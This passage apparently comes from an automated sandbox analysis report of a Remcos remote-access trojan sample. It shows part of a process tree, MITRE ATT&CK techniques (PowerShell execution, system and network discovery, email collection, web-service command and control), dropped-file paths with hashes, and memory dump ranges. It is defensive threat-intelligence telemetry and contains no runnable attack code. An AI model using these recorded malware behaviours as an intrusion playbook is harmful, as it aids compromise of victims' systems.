        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x44,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:5732
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:6668
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:6688
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6736
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:6208
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0xa8,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:6220

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1300

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
176B

MD5
c910d07d46e40b415a3f43bc7b9aebc8

SHA1
fadadf202480bbe00ed323865062b87dc505c3ef

SHA256
8c3935094a4ead5ac904db85997c78ddf266e7f96c8a183138958bf61db32798

SHA512
94dd92d2d6331a0f2ab15ab0170c1353f6177098a5eba6f33ce26049b8559bb1300f03c06ddf10dd42f87ea3b90d700bd2be15d43ec9cb6dcccdaddc5bbed9d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
36988ca14952e1848e81a959880ea217

SHA1
a0482ef725657760502c2d1a5abe0bb37aebaadb

SHA256
d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

SHA512
d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fab8d8d865e33fe195732aa7dcb91c30

SHA1
2637e832f38acc70af3e511f5eba80fbd7461f2c

SHA256
1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

SHA512
39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
67KB

MD5
4926b457580a037ed5d272dbf87776f9

SHA1
4ef2158087d0d3eea2aac98682e21aa1ce589123

SHA256
118ae6ff442b3aacfb3de8f961704b85cb0a70e1bb66e617e5bfa92e4e24499e

SHA512
4468d5db6937c7abb2491babb5e11fa9931920be287805495060192f3c253d412ab39621f70cd44a9d33c6bef72c9b44c3384d9625d1aa10868e3ec5955613f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
470KB

MD5
cb42ca61bf10114211da1a6201bbf03a

SHA1
d749c3f58cd3250c9b84c1d73c58fc1a6cf0c8e6

SHA256
89fda04ab48db2db11ac25c78f4fd3436f59d0e003e5a0587ebc900ef95d8898

SHA512
0c7bcdb53cf15269f7f5dc8a2d5ca88adf4cc4889d73e66d16d26f4cd8721bad1c4cc008a8514c4e5462815454de4ee21490e992dad115829b72c363343b067e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
79KB

MD5
e51f388b62281af5b4a9193cce419941

SHA1
364f3d737462b7fd063107fe2c580fdb9781a45a

SHA256
348404a68791474349e35bd7d1980abcbf06db85132286e45ad4f204d10b5f2c

SHA512
1755816c26d013d7b610bab515200b0f1f2bd2be0c4a8a099c3f8aff2d898882fd3bcf1163d0378916f4c5c24222df5dd7b18df0c8e5bf2a0ebef891215f148e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
89KB

MD5
6c66566329b8f1f2a69392a74e726d4c

SHA1
7609ceb7d28c601a8d7279c8b5921742a64d28ce

SHA256
f512f4fb0d4855fc4aa78e26516e9ec1cfabc423a353cd01bc68ee6098dc56d6

SHA512
aca511bfaf9b464aff7b14998f06a7e997e22fcbe7728401a1e4bd7e4eceb8c938bbd820a16d471d0b5a0589d8807b426b97292fc2a28578a62e4681185556c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
34KB

MD5
522037f008e03c9448ae0aaaf09e93cb

SHA1
8a32997eab79246beed5a37db0c92fbfb006bef2

SHA256
983c35607c4fb0b529ca732be42115d3fcaac947cee9c9632f7cacdbdecaf5a7

SHA512
643ec613b2e7bdbb2f61e1799c189b0e3392ea5ae10845eb0b1f1542a03569e886f4b54d5b38af10e78db49c71357108c94589474b181f6a4573b86cf2d6f0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
17KB

MD5
240c4cc15d9fd65405bb642ab81be615

SHA1
5a66783fe5dd932082f40811ae0769526874bfd3

SHA256
030272ce6ba1beca700ec83fded9dbdc89296fbde0633a7f5943ef5831876c07

SHA512
267fe31bc25944dd7b6071c2c2c271ccc188ae1f6a0d7e587dcf9198b81598da6b058d1b413f228df0cb37c8304329e808089388359651e81b5f3dec566d0ee0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
18KB

MD5
74f49bcdbd13777670657d78944e97f8

SHA1
862256addfc55950fa4b4da43e5619c24722bd31

SHA256
1f4aa7693f801ea02e189c3b85101e1a5c24ffd6c335d54d1b212f9981ea3f05

SHA512
c699383350446f3f665418edaf74e4e235532963801ce3c9fd57f49526aeb9b8fb6cb28fd9bb0a3e65a0521029b4d1821eade0e8a5d56eeafdca244650dd9f8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
259KB

MD5
9304479f25d8f8af6bda260a6f8bda4e

SHA1
54828173c5933b5dc8cc464d635ff59501b0d667

SHA256
7ba3de2a2dec667cee6c3c5b88d10c7c58e5e658545beec7a4e0f7191d18d3a9

SHA512
57d06cc8116647136298a3f0588ddfe6533dc617497efca471317f19a0cced0975b146ad7837ed84669cdd3549565611c7068f8c48a1e803bdd32350172f65a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
32KB

MD5
64d3be46eb793f6fe19bee805638cb80

SHA1
93bd75cf654214f8a76af8e1290499147d971c5c

SHA256
74c048fd2c6c9516438db1f627419a783622abcdc0522a5c4a1a568317a3d13c

SHA512
4646ac163dcc465669a868003b2667752eef8cad1f40dbff48c7f5d4c5f2120637f2514a0202f2008d52edfb377d1341d1b0411e556011ce9e2de194ee405908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\13a8cebaa61dbdd2_0

Filesize
188KB

MD5
4da650d48d5cbd9c5ac8daed2a71672e

SHA1
78832038c11b4d2933987029a6ae53f131b473c9

SHA256
4588840d1b26d043420d21f2876560da902d02e44981cc450629657c85636fd2

SHA512
3e631bf0d021e8911b864956860c971182b5bc9893fc5e488f2b122e3ab81bff1dd6b944b6ef2525b0becb7b331902534ecd508b35d6bded3b05363266e5c4f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\1d1912e4d73c0290_0

Filesize
295KB

MD5
4b683e8f769f80f1035da3b64b96e0b0

SHA1
120a804c86f687d6d43a9718302903cb913e7d00

SHA256
9605cfd591df10f2a716ad7ee0bcceaf9f94c2103d3b6d410b5c0499f8f0f1fd

SHA512
509d3b840ffae51d86656a6244b5ead955aabdba207df837be4a1ec5de49fca91edbed5c52361e1461353a6b785efa81647aa2ba839f6f39f53a98c41a496b7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3ab592dde6ff023e_0

Filesize
272B

MD5
3ebafb0ef828adc6bd647a5748d0b946

SHA1
0cf35388c78adb9f986299c054307c041d8e5390

SHA256
6ea865c93409900cd52b7e26d626606e65f8c2553f5ae06e19f2851c46fde9ee

SHA512
13436de706943812b6faa9c6de19be069bd044f159ab615b171767dfba719d31a4e891bf174a9a65ce536ca83f7fd73869503bad32e1eb04270cc134f08f1bd1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\47b1aa8b1f86975c_0

Filesize
1.1MB

MD5
3df88f0cc18c874b9d291a225becedcc

SHA1
0cbd909e6e1d932eba53b1a53e975ffb5cf9ddca

SHA256
f5c3e196922d3a6a798dce79f18f394c7642579ab630b8add2ea6d3453b9dfad

SHA512
c3980cdf94fb32785173654a851aee0f20c9c66c561d5fece65b07ebc03b310e8b4773cbbe3149d0f237a4a092e9d58c573e4a3e70e16222f908f82d6d76bab5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\67c896e8aae559d2_0

Filesize
291B

MD5
21bcf863319e8c9f88777663e3144194

SHA1
148356137a98ce22d1b0032510a77c9008b33b65

SHA256
56589db22f48c81af884c55665b32ecb2f09d19ea108620dd5700242c72fbcab

SHA512
ee8df795c029d7d88c158ecc5f5a1f2045ce8597e2bfd9935525365aff68ad94c72f8d8adff857103d52d62692232ebd0163a8fc2674968f72cd4e9eb8128df1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\84e2f29c15120e42_0

Filesize
1.3MB

MD5
dd74394460b142b195f83a91a5cb621c

SHA1
5e4e5e7304cc9d799d99ecc164f23b4b5ac213ed

SHA256
4a754858d7d011ddff3a992c1d796cfe4fc81a27919859acd8b994f9a4e3448b

SHA512
2475f4920aa3ed931ff9d2ddc082ca920be522d24755fb06d816f9e563f18f1b206ab43626e5dfe214f27331d37eebd2c91988b8dc68bd5633232272ee77acb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\dcaf5f5d8b2044c6_0

Filesize
297B

MD5
168aba91f5bdec929899f38a6b19e1a8

SHA1
804aaa5146b3091ca3b0734e3d80694c0b8e89ce

SHA256
b84be27d8b8e23e2253a984ed96b70b6bd5368a7b0d38420eb0fdbb33b9d02d3

SHA512
3d6eaf34639f35083a202ab1fe0b9cc9ced544a734bcfbea637597b92d3ebaa34198d5c76c9c7a6db2d4f5f342d463016180cc7514cc5ae3103dba0ce4c506dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ec1453286dabb20a_0

Filesize
1KB

MD5
fae51973bb9903ac3b26b2c574d2d1aa

SHA1
6990134c0a865ed0ff9f8d2548ed126d00dd27e1

SHA256
d1a17dd3102912313ff1b9d543c116ddbd808cd1e19d49d93b210354b87d8de5

SHA512
c16277d76788b914827070943e718f28e3348a771bceedd6128f586ad6a037b48108a21720e860e0e9c7822f0c7e2ede018dd8d32dbc32f6a086b07a4b4d1989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f29ed5b5251e1eaf_0

Filesize
269B

MD5
de7d193a8fb2ef397c1d8c8bffc82880

SHA1
5e80f966a9d5854dbf5b527e861ba4d93a02be84

SHA256
d82030d36541d33fc307854764edc6a39fe4df5bc1747b2772bc7c8697d4b22c

SHA512
91f85a640273af7e9c370c42aaae63614e7953f33545ce85cdeecfb461cfd16c8702d9c9c7e8a9961505a5f45891514712ca501f9485fb959b6b0b27038c4a8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
437B

MD5
05592d6b429a6209d372dba7629ce97c

SHA1
b4d45e956e3ec9651d4e1e045b887c7ccbdde326

SHA256
3aacb982b8861c38a392829ee3156d05dfdd46b0ecb46154f0ea9374557bc0fd

SHA512
caa85bdccabea9250e8a5291f987b8d54362a7b3eec861c56f79cebb06277aa35d411e657ec632079f46affd4d6730e82115e7b317fbda55dacc16378528abaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
43ec89c116e6dd21d419caaf70b3fb08

SHA1
7bd108f747c0ca965b29a7ed7acf1c8e5dce7440

SHA256
c457604f2a815d3be9f051616deb0b1e035cfe078493911979a6f0281dd12de6

SHA512
7c54ab13d6306d40d245f05acfe1f03c51db7b87ee7f57cd9a0f7dda336a592eaedaa527d49a044c21d0b792720f079725742fbae1cafee19bb28880ea56a89b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
e9b2931f9ecb64900c76b72938d39031

SHA1
c21d1cc63ac5ea32bd482756b21e9cf6582ebcec

SHA256
9a5fd6414cb121ae9c428a5914a17801629101b7be31c65b68bf8a2f659e51df

SHA512
302e364fc1985f743a68fca137f483fc51314cfe953747a3096a960f383e292c884274f6961af359104f6328d7696e17673a64a47b30a262395516ec6ced6dca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
cc13dbe970f5adbfb269c744f6680045

SHA1
ce9bda563a9e0958be97a4cb66493d0514d5018d

SHA256
a0f881d1bdc6cfaa765d82737f096e0f58a28f22c1e30d847d47cfb043866c38

SHA512
e4a0650dab44c76aa6d631911cbdd6a5850c589b4ca73ad5b41c4fe400e517515b93de3a24a071da0eb65052481a849cd3b9d5575d3a4108bf888bb51cdad328

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
f4bcfa44a255f131b640d2bd2bb7c067

SHA1
18208b217c5bf6945f5b853d8dec6d7577c41956

SHA256
99f6ce49809bedac96194dd946de999c46b7457a25cb5114745f52fd55fb0206

SHA512
658103c7557a996912a330f114f8506477b2837c4837d1f6a6941ca03e61a633c4daa433b210cff50b622554e38a6b6ca420b8203676c44d934a400e6bf23b18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
11dbe843f2a61a44501ce93e11a8074e

SHA1
4389a8e2a4df004ec045a4a5921c897753f9735f

SHA256
5ce9e0ab4d8e9086a8df9ed01e68d7b3d6eac7d72f072eac05baae757a713604

SHA512
09c7ff3a843fe2241b6dd54ac4ea8bd70fc56176e33d7bfb274e5cf69a675c47c0e42234e8e7b9317ab3f78bdef2a27c46ec34163f43b86718c137c4b7e840de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d536014007cd7bff74e2c69b2e9875ad

SHA1
d599ece8b7782ec1719e850ef2d79fc1bbcb66ff

SHA256
20ace069cb861aff827433d96aaf8392870612a6350baff86d5300beaf68c30d

SHA512
ac15a3dc1ff64c8a04c4ee1ebe48fbe5f450f7f462e97f932749d770257f9870df6c32e182bd753309a4876f4c3b010be597642ae203e3729dcc9b425b0c8cb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c1c077ab8b7c29666b36a55206560d7f

SHA1
465cc1564d81fe4d15f2ee56e9cb6fc56d1fde9a

SHA256
35b59c8eb4e28c43cb81ec88074196cc40aa33f14878eccdcdf3ec7c90b406e7

SHA512
45123313d8254f437ab574cdd75a6aa46b843610eabc37dd8db0887321b1eb82cb1ac4a0388e34010c71eeb00a7d954b5c9c30c8a6426d6a8cd5ffcfaac01198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
445f7ec17524eac2e9b1c1c742e85fd0

SHA1
fa0db0f33f16b514c2fbf3e2de5e6e74119187a2

SHA256
d900fce0e2d447bca845c90d818d31d88e2179178bc34471b33e35b3abb2d253

SHA512
29ebdaaaebd24687eabea081f5b6594a5e07a6540b91f83ca953a8bd0c025eb9db36143abec8949554240e4049b868aee5a4a5516c9ad22550b7389c53ead77d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e91109e99f4c34740cca3b0569f28b8b

SHA1
9835455da9a80afc52659b10f72566c19ff6c0eb

SHA256
ce243e7075eda9e44589873c61d8cf61340d74f3a426d9a82ea4b91bbc9aca07

SHA512
06f4d77dd8e1ed6bb4939e166667f5c24880b36e488ef7e94d595fa7bc743ef610a1d84ae6c4f5e093344aa6527b3e77686b06ebd9ada5de83237bfc75433fc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
896e8e06ae80358079ed19935ae81293

SHA1
0f1cf486f6c628f5d5283582731958d6e04690c9

SHA256
8cf355a6ee63d05a99a6326b7d62e9fbcb291d1a32f121c5596bc238cc861aa3

SHA512
4f1c29c3eced1339e324e7213b476814d99da4b45960f1e2cd4353fad075937454b377d5319a9590ef70d8b48d13329b117686615851645bff73620171f2aff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
bfa944b36a7a3d59c5485498fb4c449b

SHA1
806323f2abc577f5dcaa7c2385acc8b955f1b184

SHA256
3874ed6022f5a6c695278ee67fab7f30cd997d4b1bcf184957304244970577d8

SHA512
09cb4519aa1d116c109447297a0bf338b12b3f733b4a1b9bd93d6b101accdf6c6645e5ead7741cf60104631de61d7dc3a74a83e8c4148ae1d223d9937174269c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
e4be69f4e392f307708808bb62ec62ac

SHA1
8bf3e1e54b0197f83480074014057a578737549e

SHA256
2a5f548849f77acde7722fd91719b8fa269fd65f1d7fe3ccaaa6c0016cb77f34

SHA512
67c7f9245545557d9476a2d6bae4b23b5c36588b8663665e1a60815ce54c1dfe22827306df9e9e8b406a980c0d6666b43c64bb0cd489c184ad59aebc696b7b32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
367B

MD5
c03f2e0f09eba34ba549bda3ad3f4bae

SHA1
0fa2e4428d709a27636dd3a733a9455a4b955fd7

SHA256
fa108e7189dac78f57e78a991f6239db891f85b075117c08c2ac3b03bb49db83

SHA512
be71ce7e1b3ddecb4926d26e3875e0144c6451a0c18e2ffa8412af96b30099badf632d02669e882d08848cf0de7ff489213ef277155dd54b8d560ef615da4a70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
03cff913c4419e012589a1af5f140196

SHA1
b71d0c3ab58cd9bc9907f76d7ecf64b5ad67a8a7

SHA256
f7c7c98e821ca5218b8d80658a16d4909d585f0cf5946b93e70b13514b1baf91

SHA512
115c96284c5d8e20b3e312424c3d1186d8cfba591da3660aa4f9f096fcd0c12b92d1980391893137bdbb13950d1310038f78c1830412345812dde8318d610a9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
e4f7182253717e6c0e1d36006c3705eb

SHA1
1e3ecb3e49b3fd2c490ea358a346a3dc4c3681df

SHA256
285dec0f95f8d06b8050445f3a8c1a3457df10fd94ebe23a8ae4fc99d8069345

SHA512
ad3150652da9d38dad2fa098b889b748c62221ffc4f0d916e39a3a16501acdfab4186cb0d20de3292d3983c65647febbd6a081c8ee89149e8d3a36bbf9b15d86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
c7ee79d84cc9103a5d3d2f8ae35ef3ee

SHA1
447f97f0b2e3a53ff7671666b60d8717c6f1c524

SHA256
f194de6205c5a3954bfa2aaaff3d4f08beeea1f25f1cf87a1b1f3034d2e5b659

SHA512
d88d18fc898b7b1fd7fb63576a4a58c1fa2af68eee3fb6e41046e6ee6d8dab0623e33b9a2cf5f3173af9dab86e29d6f59107b21f4dd74b403ecf486212dc6d2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
06754659d7b16b6080de6c6f5e2ad559

SHA1
5bfaf1fbe41c9dfaa90c6e6ea44cf48f1dbb7793

SHA256
49c0c1908a6256879f9b76f28eebe33dbbb4a3a8331ee7dac9b47f5d6bfe4c2b

SHA512
6b8702cd37d60f9afe30221c2faefbf1a3f24a8f4f5bdecc8ff2150c2d12965cd1c4939caf7fc48c44c509160192690979dc34ae5f7c21c93d0082270a9de87c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5811ae.TMP

Filesize
371B

MD5
b8a69c36473f0f0867c0bb7b070e39d0

SHA1
fa75bd260a80f8cdf2bff235df6bd794d3b8bd59

SHA256
fdcc40a5065b386f946f546d58c17ddf1be2ca71f5866e8350c7485e11c12816

SHA512
ff1c44fca49eeaac8e79a1a8afd1c0a572d2d418d95300d0f476dc73138cf7a04c72a81f5df4cc413dcd7d46b69030b9de3689a865cacbdc32a9c0a60c0c5615

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
923854a12cc5e53ec4ec25e2474ab0d9

SHA1
66b26adb6a6ebb631591a1e16f660d06cbabd5eb

SHA256
03895b3d20bfa62e264290f9c3ef196916d7649fe53e563afc03b3a80bfc816d

SHA512
2da74835dcfa421d0546a87a545d0b6647c3c63cd7b3ec90ccbf8d3d6827a4b6ab7ba7a7fd798e61afe7ad94b3774c3db365f458c0fe75b04ad4bbc77fab3758

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3644bdec0b2f9517fad83022427d3779

SHA1
d4701015f07481c0f4a5f6f7a1e6a9f72db052bd

SHA256
66e902e6786f8d5f888e311ac966c77c3bf781cf61872ceaef61a32c4fbc620b

SHA512
cc12a66cf928828f81d3513c232794df927fab581849505dc1ba070e00cee4b5a1c981201dd6581c78a398ffcebe24e1bdc71dc2c450a6787dfa4885cbf02a1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
47237924a3438a723d27029b4ad10f68

SHA1
48ed7453d4ac8d2542cc70ab1ce4071be23448ee

SHA256
2e2d5c3c7698ef00116370092cbc0f280d7078f61949ba83288db5f26bc9b63c

SHA512
70810cfe9743457c90d8b2b648cc263c19c19ddfc0fa6b590fe2fb71c8bffe7a0b65cd8f07096a19c366eda0ccda4b21add8b11e5b30fa587a6a1b60cb32fac6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f4xikhpe.cir.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ziezeegugi

Filesize
4KB

MD5
75379d3dcbcea6a69bc75b884816dd40

SHA1
7e073a03c3bdbbc60375ddbe56bba211c3d412a6

SHA256
cab559f3bbe4a0beb194dffca723b3072184b92687100462eaab04d66fff8de9

SHA512
710c2cee369a57a0039fc0d0c59de6118780210ef60ad0daf374f03ba94ab08039bc2aff821f7c99a0ecd0e16189c52e5b6d630b3d541f7b11375f134b985e8c

Download Submit
memory/560-39-0x0000020A7EEC0000-0x0000020A7F308000-memory.dmp

Filesize
4.3MB

Download
memory/720-614-0x00000000010F0000-0x00000000010FC000-memory.dmp

Filesize
48KB

Download
memory/1420-135-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/1420-133-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/1420-137-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/3088-132-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3088-136-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
